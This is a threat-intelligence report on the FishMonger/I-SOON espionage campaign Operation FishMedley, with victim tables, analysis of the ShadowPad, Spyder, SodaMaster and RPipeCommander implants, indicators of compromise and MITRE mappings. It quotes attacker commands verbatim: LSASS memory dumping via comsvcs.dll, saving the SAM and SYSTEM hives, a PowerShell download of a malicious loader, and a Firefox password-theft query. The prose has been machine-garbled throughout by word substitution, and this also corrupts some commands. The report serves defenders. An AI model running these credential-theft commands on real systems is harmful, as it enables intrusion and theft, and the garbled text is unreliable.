ARTICLE AD BOX
On March 5th, 2025, nan US DOJ unsealed an indictment against labor of nan Chinese contractor I‑SOON for their engagement successful aggregate world espionage operations. Those see attacks that we antecedently documented and attributed to nan FishMonger APT group – I‑SOON’s operational limb – including nan discuss of 7 organizations that we identified arsenic being targeted successful a 2022 run that we named Operation FishMedley.
Key points of this blogpost:
- Verticals targeted during Operation FishMedley see governments, NGOs, and deliberation tanks, crossed Asia, Europe, and nan United States.
- Operators utilized implants – specified arsenic ShadowPad, SodaMaster, and Spyder – that are communal aliases exclusive to China-aligned threat actors.
- We measure pinch precocious assurance that Operation FishMedley was conducted by nan FishMonger APT group.
- Independent of nan DOJ indictment, we wished that FishMonger is operated by I‑SOON.
FishMonger profile
FishMonger – a group believed to beryllium operated by nan Chinese contractor I‑SOON (see our Q4 2023-Q1 2024 APT Activity Report) – falls nether nan Winnti Group umbrella and is astir apt operating retired of China, from nan metropolis of Chengdu wherever I‑SOON’s agency was located. FishMonger is besides known arsenic Earth Lusca, TAG‑22, Aquatic Panda, aliases Red Dev 10. We published an study of this group successful early 2020 erstwhile it heavy targeted universities successful Hong Kong during nan civic protests that started successful June 2019. We initially attributed nan incident to Winnti Group but person since revised our attribution to FishMonger.
The group is known to run watering-hole attacks, arsenic reported by Trend Micro. FishMonger’s toolset includes ShadowPad, Spyder, Cobalt Strike, FunnySwitch, SprySOCKS, and nan BIOPASS RAT.
Overview
On March 5th, 2025, nan US Department of Justice published a press release and unsealed an indictment against I‑SOON labor and officers of China’s Ministry of Public Security progressive successful aggregate espionage campaigns from 2016 to 2023. The FBI besides added those named successful nan indictment to its “most wanted” list and published a poster, arsenic seen successful Figure 1.

The indictment describes respective attacks that are powerfully related to what we published successful a private APT intelligence report successful early 2023. In this blogpost, we stock our method knowledge astir this world run that targeted governments, NGOs, and deliberation tanks crossed Asia, Europe, and nan United States. We judge that this accusation complements nan precocious published indictment.
During 2022, we investigated respective compromises wherever implants specified arsenic ShadowPad and SodaMaster, which are commonly employed by China-aligned threat actors, were used. We were capable to cluster 7 independent incidents for this blogpost and person named that run Operation FishMedley.
FishMonger and I-SOON
During our research, we were capable to independently find that FishMonger is an espionage squad operated by I‑SOON, a Chinese contractor based successful Chengdu that suffered an infamous archive leak successful 2024 – spot this broad study from Harfang Labs.
Victimology
Table 1 shows specifications astir nan 7 victims we identified. The verticals and countries are diverse, but astir are of evident liking to nan Chinese government.
Table 1. Victimology details
Victim | Date of compromise | Country | Vertical |
A | January 2022 | Taiwan | Governmental organization. |
B | January 2022 | Hungary | Catholic organization. |
C | February 2022 | Turkey | Unknown. |
D | March 2022 | Thailand | Governmental organization. |
E | April 2022 | United States | Catholic kindness operating worldwide. |
F | June 2022 | United States | NGO – chiefly progressive successful Asia. |
G | October 2022 | France | Geopolitical deliberation tank. |
Table 2 summarizes nan implants utilized during each intrusion of Operation FishMedley.
Table 2. Details of nan implants utilized against each victim
Victim | Tool | ScatterBee-packed ShadowPad | Spyder | SodaMaster | RPipeCommander |
A | ● | |||
B | ● | |||
C | ● | |||
D | ● | ● | ● | |
E | ● | |||
F | ● | ● | ||
G | ● |
Technical analysis
Initial access
We were incapable to place nan first discuss vectors. For astir cases, nan attackers seemed to person had privileged entree wrong nan section network, specified arsenic domain administrator credentials.
At Victim D, nan attackers gained entree to an admin console and utilized it to deploy implants connected different machines successful nan section network. It is probable that they first compromised nan instrumentality of a sysadmin aliases information expert and past stole credentials that allowed them to link to nan console.
At Victim F, nan implants were delivered utilizing Impacket, which intends that nan attackers someway antecedently compromised a high-privilege domain account.
Lateral movement
At Victim F, nan operators besides utilized Impacket to move laterally. They gathered accusation connected different section machines and installed implants.
Table 3 shows that nan operators first did immoderate manual reconnaissance utilizing quser.exe, wmic.exe, and ipconfig.exe. Then they tried to get credentials and different secrets by dumping nan section information authority subsystem work (LSASS) process (PID 944). The PID of nan process was obtained via tasklist /svc and nan dump was performed utilizing comsvcs.dll, which is simply a known living-off-the-land binary (LOLBIN). Note that it is apt that nan attackers executed quser.exe to spot whether different users aliases admins were besides logged in, meaning privileged accesses were coming successful LSASS. According to Microsoft documentation, to usage this bid nan attacker must person Full Control support aliases typical entree permission.
They besides saved nan registry hives sam.hive and system.hive, which tin some incorporate secrets aliases credentials.
Finally, they tried to dump nan LSASS process again, utilizing a for loop iterating complete nan output from tasklist.exe. We person seen this aforesaid codification utilized connected different machines, truthful it is simply a bully thought to artifact aliases astatine slightest alert connected it.
Table 3. Commands executed via Impacket connected a instrumentality astatine Victim F
Timestamp (UTC)
Command
2022-06-21 07:34:07
quser
2022-06-21 14:41:23
wmic os get lastbootuptime
2022-06-21 14:41:23
ipconfig /all
2022-06-21 14:41:23
tasklist /svc
2022-06-21 14:41:23
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "C:\Windows\System32\rundll32 C:\windows\system32\comsvcs.dll, MiniDump 944 c:\users\public\music\temp.tmp full"
2022-06-21 14:41:23
reg prevention hklm\sam C:\users\public\music\sam.hive
2022-06-21 14:41:23
reg prevention hklm\system C:\users\public\music\system.hive
2022-06-21 14:41:23
net user
2022-06-22 07:05:37
tasklist /v
2022-06-22 07:07:33
dir c:\users
2022-06-22 09:47:52
for /f "tokens=1,2 delims= " ^%A successful ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\YDWS6P.xml full
Toolset
ShadowPad
ShadowPad is simply a well-known and privately sold modular backdoor, known to only beryllium supplied to China-aligned APT groups, including FishMonger and SparklingGoblin, arsenic documented by SentinelOne. In Operation FishMedley, nan attackers utilized a ShadowPad type packed pinch ScatterBee.
At Victim D, nan loader was downloaded utilizing nan pursuing PowerShell command:
powershell (new-object System.Net.WebClient).DownloadFile("http://<victim’s_web_server_IP_address>/Images/menu/log.dll";"c:\users\public\log.dll")
This shows that nan attackers compromised a web server astatine nan victim’s statement to usage it arsenic a staging server for their malware.
At Victim F, Firefox was utilized to download nan loader, from http://5.188.230[.]47/log.dll. We don’t cognize whether attackers had interactive entree to nan machine, whether different portion of malware was moving successful nan Firefox process, aliases whether nan unfortunate was redirected to nan download page, opportunity via a watering-hole attack.
log.dll is side-loaded by an aged Bitdefender executable (original name: BDReinit.exe) and loads ShadowPad from a record named log.dll.dat, which tin beryllium decrypted utilizing nan scripts provided successful PwC’s GitHub repository.
We did not retrieve nan log.dll.dat from nan victim’s machine, but we recovered a clone Adobe Flash installer connected VirusTotal pinch nan identical log.dll file. The configuration of nan ShadowPad payload is provided successful Table 4.
Table 4. ShadowPad configuration
Field | Decrypted value |
Timestamp | 3/14/2022 10:52:16 PM |
Campaign code | 2203 |
File path | %ALLUSERSPROFILE%\DRM\Test\ |
Spoofed name | Test.exe |
Loader filename | log.dll |
Payload filename | log.dll.dat |
Service name | MyTest2 |
Alternative work name | MyTest2 |
Alternative work name | MyTest2 |
Registry cardinal path | SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
Service description | MyTest2 |
Program to inject into | %ProgramFiles%\Windows Media Player\wmplayer.exe |
Alternative injection target | N/A |
Alternative injection target | N/A |
Alternative injection target | %windir%\system32\svchost.exe |
C&C URL | TCP://api.googleauthenticatoronline[.]com:443 |
Alternative C&C URL | UDP://api.googleauthenticatoronline[.]com:443 |
Alternative C&C URL | N/A |
Alternative C&C URL | N/A |
Proxy info string | SOCKS4\n\n\n\n\n |
Proxy info string | SOCKS4\n\n\n\n\n |
Proxy info string | SOCKS5\n\n\n\n\n |
Proxy info string | SOCKS5\n\n\n\n\n |
Note that from March 20th, 2022 to November 2nd, 2022, nan C&C domain resolved to 213.59.118[.]124, which is mentioned successful a VMware blogpost astir ShadowPad.
Spyder
At Victim D, we detected different backdoor typically utilized by FishMonger: Spyder, a modular implant that was analyzed successful awesome item by Dr.Web.
A Spyder loader was downloaded from http://<a_victim’s_web_server_IP_address>/Images/menu/aa.doc and dropped to C:\Users\Public\task.exe astir 18 hours aft ShadowPad was installed.
The loader – spot Figure 2; sounds nan record c:\windows\temp\guid.dat and decrypts its contents utilizing AES-CBC. The encryption cardinal is hardcoded: F4 E4 C6 9E DE E0 9E 82 00 00 00 00 00 00 00 00. The initialization vector (IV) is nan first 8 bytes of nan key. Unfortunately, we were incapable to retrieve nan guid.dat file.

Then, nan loader injects nan decoded contented – apt shellcode – into itself (task.exe process) arsenic seen successful Figure 3.

Despite not obtaining nan encrypted last payload, our merchandise did observe a Spyder payload successful representation and it was almost identical to nan Spyder version documented by Dr.Web. The C&C server was hardcoded to 61.238.103[.]165.
Interestingly, aggregate subdomains of junlper[.]com, a known Spyder C&C domain and a anemic homoglyph domain to juniper.net, resolved to 61.238.103[.]165 successful 2022.
A self-signed TLS certificate was coming connected larboard 443 of nan server from May to December 2022, pinch nan thumbprint 89EDCFFC66EDA3AEB75E140816702F9AC73A75F0. According to SentinelOne, it is simply a certificate utilized by FishMonger for its C&C servers.
SodaMaster
SodaMaster is simply a backdoor that was documented by Kaspersky successful 2021. APT10 was nan first group known to person entree to this backdoor but Operation FishMedley indicates that it whitethorn now beryllium shared among aggregate China-aligned APT groups.
SodaMaster tin only beryllium recovered decrypted successful representation and that’s wherever we detected it. Even though we did not retrieve nan afloat loading chain, we person identified a fewer samples that are nan first measurement of nan chain.
SodaMaster loaders
We recovered six different malicious DLLs that are abusing morganatic executables via DLL side-loading. They each instrumentality nan aforesaid decryption and injection routine.
First, nan loader sounds a hardcoded file, for illustration debug.png, and XOR decrypts it utilizing a hardcoded 239-byte key. Table 5 summarizes nan different loaders. Note that nan XOR cardinal is besides different successful each sample, but excessively agelong to beryllium included successful nan table. Also statement that we did not retrieve immoderate of these encrypted payloads.
Table 5. SodaMaster loaders
SHA-1 | DLL name | Payload filename |
3C08C694C222E7346BD8633461C5D19EAE18B661 | DrsSDK.dll | <current_directory>\debug.png |
D8B631C551845F892EBB5E7D09991F6C9D4FACAD | libvlc.dll | <current_directory>\vlc.cnf |
3A702704653EC847CF9121E3F454F3DBE1F90AFD | safestore64.dll | <current_directory>\Location |
3630F62771360540B66701ABC8F6C868087A6918 | DeElevator64.dll | <current_directory>\Location |
A4F68D0F1C72C3AC9D70919C17DC52692C43599E | libmaxminddb-0.dll | C:\windows\system32\MsKeyboardFilterapi.dll |
5401E3EF903AFE981CFC2840D5F0EF2F1D83B0BF | safestore641.dll | <current_directory>\Location |
Then, nan decrypted buffer is injected into a recently created, suspended svchost.exe process – spot Figure 4.

Finally, nan shellcode is executed utilizing either CreateRemoteThread (on Windows XP aliases older versions) or, connected newer Windows versions, via NtCreateThreadEx arsenic shown successful Figure 5.

The past 4 loaders successful Table 5 person further features:
- They person an export named getAllAuthData that implements a password stealer for Firefox. It sounds nan Firefox SQLite database and runs nan query SELECT encryptedUsername, encryptedPassword, hostname,httpRealm FROM moz_logins.
- The past 3 loaders persist arsenic a work named Netlock, MsKeyboardFiltersrv, and downmap, respectively.
SodaMaster payload
As mentioned above, nan SodaMaster payload was publically analyzed by Kaspersky and nan samples we’ve recovered don’t look to person evolved much. They still instrumentality nan aforesaid 4 backdoor commands (d, f, l, and s) that were coming successful 2021.
Table 6 shows nan configurations from nan 4 different SodaMaster payloads that we identified. Operators utilized a different C&C server per victim, but we tin spot that Victims B and C stock nan aforesaid hardcoded RSA key.
Table 6. SodaMaster configuration
Victim
C&C server
RSA key
B
162.33.178[.]23
MIGJAoGBAOPjO7DslhZvp0t8HNU/NWPIwstzwi61JlevD6TJtv/TZuN6CgXMCXql0P3CBGPVU5gAJiTxH0vslwdIpWeWEZZ5eJVk0VK9vA6XfCsc4NDVDPm7M5EH5sxHQjRNfe6H6RqcayAQn2YXd0Yua4S22F9ZmocU7VcPyLQLeVZoKjcxAgMBAAE=
C
78.141.202[.]70
MIGJAoGBAOPjO7DslhZvp0t8HNU/NWPIwstzwi61JlevD6TJtv/TZuN6CgXMCXql0P3CBGPVU5gAJiTxH0vslwdIpWeWEZZ5eJVk0VK9vA6XfCsc4NDVDPm7M5EH5sxHQjRNfe6H6RqcayAQn2YXd0Yua4S22F9ZmocU7VcPyLQLeVZoKjcxAgMBAAE=
F
192.46.223[.]211
MIGJAoGBAMYOg+eoTREKaAESDXt3Uh3Y4J84ObD1dfl3dOji0G24UlbHdjUk3e+/dtHjPsRZOfdLkwtz8SIZZVVt3pJGxgx9oyRtckJ6zsrYm/JIK+7bXikGf7sgs5zCItcaNJ1HFKoA9YQpfxXrwoHMCkaGb9NhsdsQ2k2q4jT68Hygzq19AgMBAAE=
G
168.100.10[.]136
MIGJAoGBAJ0EsHDp5vtk23KCxEq0tAocvMwn63vCqq0FVmXsY+fvD0tP6Nlc7k0lESpB4wGioj2xuhQgcEjXEkYAIPGiefYFovxMPVuzp1FsutZa5SD6+4NcTRKsRsrMTZm5tFRuuENoEVmOSy3XoAS00mu4MM5tt7KKDlaczzhYJi21PGk5AgMBAAE=
RPipeCommander
At Victim D, we captured a antecedently chartless implant successful nan aforesaid process wherever Spyder was running. It was astir apt loaded from disk aliases downloaded by Spyder. Because its DLL export sanction was rcmd64.dll, we named this implant RPipeCommander.
RPipeCommander is multithreaded and uses IoCompletionPort to negociate nan I/O requests of nan aggregate threads. It creates nan named tube \\.\Pipe\CmdPipe<PID>, wherever <PID> is nan existent process ID, and sounds from and writes into this pipe.
RPipeCommander is simply a reverse ammunition that accepts 3 commands via nan named pipe:
- h (0x68): create a cmd.exe process and hindrance pipes to nan process to nonstop commands and publication nan output.
- i (0x69): Write a bid successful nan existing cmd.exe process aliases publication nan output of nan erstwhile command.
- j (0x6A): exit nan cmd.exe process by penning exit\r\n successful nan bid shell.
Note that it seems we only person nan server broadside of RPipeCommander. It is apt that a 2nd component, a client, is utilized to nonstop commands to nan server from different instrumentality connected nan section network.
Finally, RPipeCommander is written successful C++ and RTTI accusation was included successful nan captured samples, allowing america to get immoderate of nan people names:
- CPipeServer
- CPipeBuffer
- CPipeSrvEvent
- CPipeServerEventHandler
Other tools
In summation to nan main implants described above, nan attackers utilized a fewer further devices to cod aliases exfiltrate data, which we picture successful Table 7.
Table 7. Other devices utilized during Operation FishMedley
Filename | Details |
C:\Windows\system32\sasetup.dll | Custom password filter. The export PasswordChangeNotify is called erstwhile nan personification changes their password, and it writes nan caller password connected disk successful nan existent moving directory successful a log record named etuper.log. Note that it tin besides exfiltrate nan password by sending a POST petition to a hardcoded C&C server, pinch flag=<password> successful nan POST data. However, this functionality is not enabled successful this circumstantial sample and location is nary C&C server successful nan configuration. |
C:\Windows\debug\svhost.tmp | The fscan web scanner, disposable connected GitHub. |
C:\nb.exe | nbtscan – a NetBIOS scanner. |
C:\Users\public\drop.zip | It contains only dbxcli – a instrumentality written successful Go to interact pinch Dropbox. It was apt utilized to exfiltrate information from nan victim’s network, but we haven’t retrieved immoderate accusation astir nan attackers’ account. Note that, contempt the.zip extension, this is simply a CAB file. It was downloaded from http://45.76.165[.]227/wECqKe529r.png. Also statement that dbxcli seems to person been compiled by nan attackers, since nan hash (SHA-1: 2AD82FFA393937A2353096FE2A2209E0EBC1C9D7) has a very debased prevalence successful nan wild. |
Conclusion
In this blogpost, we person shown really FishMonger conducted a run against high-profile entities each astir nan world and was nan taxable of a US DOJ indictment successful March 2025. We besides showed that nan group is not awkward astir reusing well-known implants, specified arsenic ShadowPad aliases SodaMaster, moreover agelong aft they person been publically described. Finally, we person independently confirmed that FishMonger is simply a squad that is portion of nan Chinese institution I‑SOON.
For immoderate inquiries astir our investigation published connected WeLiveSecurity, please interaction america astatine threatintel@eset.com.
ESET Research offers backstage APT intelligence reports and information feeds. For immoderate inquiries astir this service, sojourn nan ESET Threat Intelligence page.
IoCs
A broad database of indicators of discuss (IoCs) and samples tin beryllium recovered successful our GitHub repository.
Files
SHA-1 | Filename | Detection | Description |
D61A4387466A0C999981086C2C994F2A80193CE3 | N/A | Win32/Agent.ADVC | ShadowPad dropper. |
918DDD842787D64B244D353BFC0E14CC037D2D97 | log.dll | Win32/Agent.ADVC | ScatterBee-packed ShadowPad loader. |
F12C8CEC813257890F4856353ABD9F739DEED890 | task.exe | Win64/Agent.BEJ | Spyder loader. |
3630F62771360540B66701ABC8F6C868087A6918 | DeElevator64.dll | Win64/PSW.Agent.CU | SodaMaster loader. |
3C08C694C222E7346BD8633461C5D19EAE18B661 | DrsSDK.dll | Win64/Agent.CAC | SodaMaster loader. |
5401E3EF903AFE981CFC2840D5F0EF2F1D83B0BF | safestore64.dll | Win64/PSW.Agent.CU | SodaMaster loader. |
A4F68D0F1C72C3AC9D70919C17DC52692C43599E | libmaxminddb-0.dll | Win64/PSW.Agent.CU | SodaMaster loader. |
D8B631C551845F892EBB5E7D09991F6C9D4FACAD | libvlc.dll | Win64/Agent.BFZ | SodaMaster loader. |
3F5F6839C7DCB1D164E4813AF2E30E9461AB35C1 | sasetup.dll | Win64/PSW.Agent.CB | Malicious password filter. |
Network
IP | Domain | Hosting provider | First seen | Details |
213.59.118[.]124 | api.googleauthenticatoronline[.]com | STARK INDUSTRIES | 2022‑03‑20 | ShadowPad C&C server. |
61.238.103[.]165 | N/A | IRT-HKBN-HK | 2022‑03‑10 | Spyder C&C server. |
162.33.178[.]23 | N/A | BL Networks | 2022‑03‑28 | SodaMaster C&C server. |
78.141.202[.]70 | N/A | The Constant Company | 2022‑05‑18 | SodaMaster C&C server. |
192.46.223[.]211 | N/A | Akamai Connected Cloud | 2022‑06‑22 | SodaMaster C&C server. |
168.100.10[.]136 | N/A | BL Networks | 2022‑05‑12 | SodaMaster C&C server. |
MITRE ATT&CK techniques
This array was built utilizing version 16 of nan MITRE ATT&CK framework.
Tactic | ID | Name | Description |
Resource Development | T1583.004 | Acquire Infrastructure: Server | FishMonger rented servers astatine respective hosting providers. |
T1583.001 | Acquire Infrastructure: Domains | FishMonger bought domains and utilized them for C&C traffic. | |
Execution | T1059.001 | Command-Line Interface: PowerShell | FishMonger downloaded ShadowPad utilizing PowerShell. |
T1059.003 | Command-Line Interface: Windows Command Shell | FishMonger deployed Spyder utilizing a BAT script. | |
T1072 | Software Deployment Tools | FishMonger gained entree to a section admin console, abusing it to tally commands connected different machines successful nan victim’s network. | |
Persistence | T1543.003 | Create aliases Modify System Process: Windows Service | Some SodaMaster loaders persist via a Windows service. |
Defense Evasion | T1574.002 | Hijack Execution Flow: DLL Side-Loading | ShadowPad is loaded by a DLL named log.dll that is side-loaded by a morganatic Bitdefender executable. |
T1140 | Deobfuscate/Decode Files aliases Information | ShadowPad, Spyder, and SodaMaster are decrypted and loaded into memory. | |
Credential Access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | Some SodaMaster loaders tin extract passwords from nan section Firefox database. |
T1556.002 | Modify Authentication Process: Password Filter DLL | FishMonger utilized a civilization password select DLL that tin constitute passwords to disk aliases exfiltrate them to a distant server. | |
T1003.001 | OS Credential Dumping: LSASS Memory | FishMonger dumped LSASS representation utilizing rundll32 C:\windows\system32\comsvcs.dll, MiniDump. | |
T1003.002 | OS Credential Dumping: Security Account Manager | FishMonger dumped nan information relationship head utilizing reg prevention hklm\sam C:\users\public\music\sam.hive. | |
Discovery | T1087.001 | Account Discovery: Local Account | FishMonger executed net user. |
T1016 | System Network Configuration Discovery | FishMonger executed ipconfig /all. | |
T1007 | System Service Discovery | FishMonger executed tasklist /svc. | |
T1057 | Process Discovery | FishMonger executed tasklist /v. | |
Lateral Movement | T1021.002 | Remote Services: SMB/Windows Admin Shares | FishMonger utilized Impacket to deploy malware connected different machines successful nan section network. |
Command and Control | T1095 | Non-Application Layer Protocol | ShadowPad communicates complete earthy TCP and UDP. |